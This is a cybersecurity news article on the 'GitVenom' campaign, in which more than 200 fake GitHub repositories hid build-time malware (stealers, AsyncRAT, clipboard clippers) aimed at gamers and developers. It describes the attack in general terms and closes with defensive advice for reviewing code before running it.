In a recent discovery, security researchers have found more than 200 malicious repositories on GitHub that were part of a large-scale campaign targeting gamers and developers. These projects appeared to be normal open-source tools like game cheats, Telegram bots, or social media utilities. But behind the scenes, they were designed to deliver malware to anyone who downloaded or ran them.
This campaign has been dubbed “GitHub Trojan Campaign” or “GitVenom” by cybersecurity experts. The attackers used GitHub’s trust and popularity to spread their malware, hiding it inside code libraries that looked genuine and useful. Some of these repositories had thousands of automated commits and AI-generated README files to make them look even more authentic.
What made this campaign dangerous was how well the fake repositories were built. The README files were written in multiple languages, and the project descriptions were clean and professional. All this effort was done to fool developers and security researchers into thinking they were safe to use.
Once someone downloaded the repository and built or ran the code, the malicious scripts were triggered. These scripts downloaded malware in the background, giving attackers full access to the victim’s system or allowing them to steal sensitive data. In many cases, these malware files were information stealers that captured login credentials, browser data, and even cryptocurrency wallet addresses.
One of the common malware types used in this campaign was a Node.js stealer. It would collect saved passwords, browser cookies, session tokens, and files, then compress them into a zip file and send them to the attacker through Telegram. Another variant used AsyncRAT, a tool that gives hackers remote control over the infected device. Other tools included clipboard clippers, which watch for copied crypto wallet addresses and silently replace them with the attacker’s own address to redirect funds during transactions.
One attack even resulted in stolen cryptocurrency worth nearly 5 Bitcoin (around $485,000). That’s a major loss, especially for developers who trusted open-source projects.
The campaign has been running for almost two years and is believed to have affected developers and users from countries like Russia, Brazil, and Turkey. The repositories targeted various coding languages such as Python, JavaScript, C, C++, and C#, which means the attackers aimed for a wide range of developers.
The goal of this attack was not just to infect one or two users. It was a supply chain-style attack, where the infected code gets passed on as part of larger projects, tools, or libraries, affecting even more people over time.
One major reason this campaign was so successful is because developers often trust code found on GitHub. Many people skip reviewing the build scripts or dependencies, assuming that popular or active repositories are safe. But in this case, those same build scripts were hiding malware that could silently steal data or give hackers control of the device.
To stay safe, users should follow a few important steps. First, always review any build scripts or pre-build events before running code, especially from unknown repositories. Second, avoid downloading files or repositories shared in random Telegram groups, Discord servers, or forums. Third, keep your anti-malware and endpoint security tools updated, and don’t ignore suspicious behavior on your device. Lastly, if you ever come across a suspicious GitHub project, report it to GitHub immediately.
This campaign is a strong reminder that even trusted platforms like GitHub can be used for cyberattacks. It’s important to double-check what you’re downloading and running, especially if it includes scripts, executables, or dependencies you don’t recognize.
The GitVenom campaign proves that open-source projects can be weaponized, and being cautious isn’t optional anymore, it’s necessary.
Stay alert, and keep your security measures updated!
Source: Follow cybersecurity88 on X and LinkedIn for the latest cybersecurity news
